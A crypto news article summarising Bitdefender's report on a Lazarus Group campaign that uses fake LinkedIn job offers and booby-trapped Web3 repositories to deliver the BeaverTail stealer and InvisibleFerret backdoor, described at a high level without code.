Crypto News

Beware the Lazarus Group: Scammers Exploit LinkedIn to Deliver Cryptocurrency Malware

February 6, 2025
Smart Money

North Korea-Linked Lazarus Group Exploits Fake Job Offers to Distribute Malware

In a recent cybersecurity revelation, the Lazarus Group, a hacking organization with ties to North Korea, has been linked to an ongoing campaign that exploits fake job offers on LinkedIn within the cryptocurrency and travel sectors. This malicious endeavor aims to deliver sophisticated malware capable of infecting Windows, macOS, and Linux operating systems.

The Scam Unfolds

According to a report by the cybersecurity firm Bitdefender, the scam initiates through messages sent on LinkedIn, targeting professionals with promises of remote work, flexible part-time hours, and competitive pay. Once the target shows interest, the scammer masquerades as a recruiter and requests sensitive information, including a resume or a link to the victim’s personal GitHub repository.

Bitdefender cautioned that while these requests may appear innocuous, they often serve malicious purposes. By harvesting personal data, the scammers lend their operation a façade of legitimacy, effectively drawing victims deeper into the scheme.

The Delivery Mechanism

After collecting the requested details, the attacker, still posing as a recruiter, shares a link to a GitHub or Bitbucket repository. This link typically leads to a minimum viable product (MVP) version of a seemingly legitimate decentralized exchange (DEX) project. Embedded within the project’s code is an obfuscated script designed to fetch a second-stage payload from a compromised site, api.npoint[.]io, which is a cross-platform JavaScript information stealer.

This stealer is engineered to extract data from various cryptocurrency wallet extensions installed on the victim’s browser. It also functions as a loader, enabling the download of a Python-based backdoor that monitors clipboard changes, maintains remote access, and facilitates the installation of additional malware.

Insights from Cybersecurity Experts

Bitdefender identified the infection methods as part of a broader attack cluster termed ‘Contagious Interview,’ also known as DeceptiveDevelopment or DEVPOPPER. This cluster is notably crafted to deploy a JavaScript stealer, known as BeaverTail, alongside a Python implant called InvisibleFerret.

“The analyzed malware appears to be from the Contagious Interview cluster,” stated a representative from Bitdefender Labs. “However, it’s important to note that the JavaScript sample we’ve examined shows differences from previous BeaverTail samples, indicating that threat actors are continually evolving their tactics.”

A Multifaceted Threat

The malware circulated via this scheme is a complex .NET binary capable of initiating a TOR proxy server to communicate with command-and-control (C2) servers. This malware can exfiltrate basic system information, deliver further payloads, siphon sensitive data, log keystrokes, and even activate a cryptocurrency miner.

Bitdefender described the infection chain as intricate, employing malicious software written in various programming languages and leveraging multiple technologies. This includes multi-layered Python scripts that execute recursively, a JavaScript stealer that gathers browser data, and .NET-based programs that can disable security tools and configure TOR proxies.

A Widespread Operation

There is emerging evidence that this campaign could be widespread, as discussions about these tactics have surfaced on platforms like LinkedIn and Reddit. In some variations of the scam, potential candidates are instructed to clone Web3 repositories and execute them locally as part of the interview process. In other instances, they are tasked with fixing intentionally planted bugs in the code.

For instance, Bitdefender noted the existence of a Bitbucket repository named ‘miketoken_v2,’ which has since been taken down. Although these repositories have been removed, Bitdefender confirmed that the activity still aligns with the same overarching campaign, even as the names of repositories and recruiter profiles continue to be shuffled.

Conclusion

This disclosure follows closely on the heels of another report by SentinelOne, which highlighted similar tactics related to the ‘Contagious Interview’ campaign being used to deliver malware known as FlexibleFerret. As digital threats continue to evolve, the importance of vigilance in online interactions and the verification of job offers is paramount.

For those interested in staying informed about evolving cybersecurity threats and trends, be sure to follow us on Twitter and LinkedIn for exclusive updates.